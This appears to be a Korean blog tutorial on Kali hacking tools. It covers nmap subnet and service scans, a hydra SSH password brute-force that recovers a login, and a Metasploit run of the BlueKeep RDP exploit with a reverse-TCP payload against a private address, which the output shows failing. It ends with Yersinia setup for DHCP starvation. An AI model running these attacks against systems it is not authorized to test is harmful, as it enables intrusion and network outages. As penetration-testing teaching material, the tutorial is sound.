반응형

 


작성일:  2023년 8월 16일

 

nmap 명령

nmap 명령을 이용하여 특정 호스트에서 제공하는 서비스를 확인한다.

(즉, Listening하고 있는 TCP, UDP 포트를 스캔한다)

##
## 10.1.4.0 Network에 있는 Host의 IP address와 MAC address를 탐색하기
##

$ nmap -sn 10.1.4.0/24
Nmap scan report for 10.1.4.1
Host is up (0.0018s latency).
MAC Address: 1C:AF:AF:33:77:CF (JunOS Systems)
... 중간 생략 ...
Nmap scan report for 10.1.4.165
Host is up (0.0013s latency).
MAC Address: AB:A3:2E:34:36:31 (My Company)
Nmap scan report for kali.korea.kr (10.1.4.55)
Host is up.
Nmap done: 256 IP addresses (14 hosts up) scanned in 4.36 seconds



##
## 192.168.3.0 ~ 192.168.0.255 범위에 속하는 Network 장비의
## 서비스 포트를 스캔한다.
##

$ nmap -sV 192.168.3.0/24

Starting Nmap 7.80 ( https://nmap.org ) at 2023-08-15 16:59 KST

... 중간 생략 ...

Nmap scan report for my-host.andrew.bastion (192.168.3.11)
Host is up (0.00049s latency).
Not shown: 993 closed ports
PORT     STATE    SERVICE       VERSION
22/tcp   open     ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp  open     rpcbind       2-4 (RPC #100000)
139/tcp  open     netbios-ssn   Samba smbd 4.6.2
445/tcp  open     netbios-ssn   Samba smbd 4.6.2
2049/tcp open     nfs_acl       3 (RPC #100227)
3389/tcp filtered ms-wbt-server
5000/tcp open     http          Docker Registry (API: 2.0)
MAC Address: 18:C0:4D:8A:DB:29 (Giga-byte Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

... 중간 생략 ...

Nmap scan report for 192.168.3.130
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.5-10.11.4-MariaDB-log
MAC Address: 00:07:32:4A:78:1E (Aaeon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

... 중간 생략 ...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (11 hosts up) scanned in 419.38 seconds

$ 



##
## 10.1.4.8 host의 상세한 정보를 위한 스캔 방법
## (참고: -A 옵션은 -O -sV --script=default --traceroute 옵션과 동일하다)
##

$ nmap -A 10.1.4.8

 

hydra 명령

위 nmap 명령을 수행하여 얻은 네트워크 서비스 정보(IP Address, TCP/UDP Port)를 확인하고,

hydra 명령을 이용하여 ssh 서비스에 접근해본다. (ssh, ftp, mysql, nfs, http 등 모든 서비스에 대해서 테스트할 수 있다)

$ cat passwd.tx

mytestpw
mypasswd
thetest
junkpass
...
...

$

##
## ssh 로그인 테스트
##

$ hydra -l mytestid -P passwd.txt -v -V -f 192.168.3.11 ssh

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-15 17:07:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://192.168.3.11:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://mytestid@192.168.3.11:22
[INFO] Successful, password authentication is supported by ssh://192.168.3.11:22
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "mytestpw" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "mypasswd" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "thetest" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "junkpass" - 4 of 4 [child 3] (0/0)
[22][ssh] host: 192.168.3.11   login: mytestid   password: thetest
[STATUS] attack finished for 192.168.3.11 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-15 17:07:16


##
## mysql 로그인 테스트
##

$ hydra -l mytestid -P passwd.txt -v -V -f 192.168.3.11 mysql

...
...

 

 

msfdb, msfconsole 명령

Metasploit 해킹 테스트 도구를 이용하여 인터넷 서비스(예: Samba)의 취약점을 확인하고, 해당 취약점을 해킹 경로로 삼을 수 있다.

긴 설명보다는 아래의 예제를 보는 것이 이해하기 좋을 듯~

$ sudo -s

$ msfdb init

[?] Would you like to init the webservice? (Not Required) [no]:
Clearing http web data service credentials in msfconsole
Running the 'init' command for the database:
Existing database running



$ msfdb start

[?] Would you like to start the webservice? (Not Required) [no]:
Clearing http web data service credentials in msfconsole
Running the 'start' command for the database:
Database already started at /home/myuser/snap/metasploit-framework/common/.msf4/db



$ msfdb status

====================================================================
Running the 'status' command for the database:
Database started
====================================================================

====================================================================
Running the 'status' command for the webservice:
MSF web service is running as PID 81810
====================================================================



$ msfconsole
...
... 중간 생략 ...
...
Metasploit Documentation: https://docs.metasploit.com/

##
## 참고 설명:
##   - 옵션은 "모든 취약점을 리스팅"하라는 뜻
##   -s  disclosure_date 옵션은 "해당 취약점 공개 날짜 순서로 정렬"하라는 뜻
##

msf6 > search - -s disclosure_date
...
... 중간 생략 ...
...
   5221  exploit/linux/http/pyload_js2py_exec                                               2023-01-13       excellent  Yes    pyLoad js2py Python Execution
   5222  exploit/linux/http/froxlor_log_path_rce                                            2023-01-29       excellent  Yes    Froxlor Log Path RCE
   5223  auxiliary/scanner/http/joomla_api_improper_access_checks                           2023-02-01       normal     Yes    Joomla API Improper Access Checks
   5224  exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669                             2023-02-01       excellent  No     Fortra GoAnywhere MFT Unsafe Deserialization RCE
   5225  exploit/multi/http/lucee_scheduled_job                                             2023-02-10       excellent  No     Lucee Authenticated Scheduled Job Code Execution
   5226  exploit/linux/http/fortinac_keyupload_file_write                                   2023-02-16       excellent  Yes    Fortinet FortiNAC keyUpload.jsp arbitrary file write
   5227  exploit/unix/webapp/spip_rce_form                                                  2023-02-27       excellent  Yes    SPIP form PHP Injection
   5228  exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360                             2023-03-14       excellent  Yes    Adobe ColdFusion Unauthenticated Remote Code Execution
   5229  exploit/linux/misc/unidata_udadmin_auth_bypass                                     2023-03-30       excellent  Yes    Rocket Software Unidata udadmin_server Authentication Bypass
   5230  exploit/linux/misc/unidata_udadmin_password_stack_overflow                         2023-03-30       good       Yes    Rocket Software Unidata udadmin_server Stack Buffer Overflow in Password
   5231  exploit/multi/http/pentaho_business_server_authbypass_and_ssti                     2023-04-04       excellent  Yes    Pentaho Business Server Auth Bypass and Server Side Template Injection RCE
   5232  exploit/aix/local/invscout_rpm_priv_esc                                            2023-04-24       excellent  Yes    invscout RPM Privilege Escalation
   5233  exploit/windows/http/ivanti_avalanche_filestoreconfig_upload                       2023-04-24       excellent  Yes    Ivanti Avalanche FileStoreConfig File Upload

##
## 만약, Windows RDP(Remote Desktop Protocol)에 관련한 취약점을 검색하고 싶다면
## 아래 명령처럼 수행하면 된다.
##

msf6 > search -s disclosure_date  "RDP Remote Windows"

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
   1   auxiliary/scanner/rdp/rdp_scanner                                      normal  No     Identify endpoints speaking the Remote Desktop Protocol (RDP)
   2   post/windows/gather/credentials/mremote                                normal  No     Windows Gather mRemote Saved Password Extraction
   3   post/windows/manage/enable_rdp                                         normal  No     Windows Manage Enable Remote Desktop
   4   exploit/windows/fileformat/cain_abel_4918_rdp         2008-11-30       good    No     Cain and Abel RDP Buffer Overflow
   5   exploit/windows/fileformat/adobe_flashplayer_button   2010-10-28       normal  No     Adobe Flash Player "Button" Remote Code Execution
   6   exploit/windows/fileformat/wireshark_packet_dect      2011-04-18       good    No     Wireshark packet-dect.c Stack Buffer Overflow (local)
   7   auxiliary/dos/windows/rdp/ms12_020_maxchannelids      2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   8   exploit/windows/http/sws_connection_bof               2012-07-20       normal  Yes    Simple Web Server Connection Header Buffer Overflow
   9   exploit/multi/script/web_delivery                     2013-07-19       manual  No     Script Web Delivery
   10  exploit/multi/vnc/vnc_keyboard_exec                   2015-07-10       great   No     VNC Keyboard Remote Code Execution
   11  exploit/windows/rdp/rdp_doublepulsar_rce              2017-04-14       great   Yes    RDP DOUBLEPULSAR Remote Code Execution
   12  exploit/windows/rdp/cve_2019_0708_bluekeep_rce        2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free


Interact with a module by name or index. For example info 12, use 12 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

msf6 > 

msf6 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 10.1.4.50
rhosts => 10.1.4.50

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 10.1.4.51:4444
[*] 10.1.4.50:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.1.4.50:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[*] 10.1.4.50:3389        - Scanned 1 of 1 hosts (100% complete)
[-] 10.1.4.50:3389 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The target service is not running or refused our connection. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exit

$

 

터미널에서 CLI를 수행하는 것치고는 출력물이 예쁘게 나온다. (아래 화면 캡처를 참고)

 

 

yersinia 해킹 도구를 이용하여 DHCP 자원을 고갈시키기

$ sudo -s

$ apt install yersinia

##
## Graphic User Interface Mode로 실행
##

$ yersinia -G

위 명령을 실행하면, 아래와 같이 Yersinia GUI를 볼 수 있다.

기본으로 모든 Protocol이 선택되어 있는데, 다 해제하고 DHCP만 선택하여 테스트한다.

Yersinia GUI 화면

 

+ Recent posts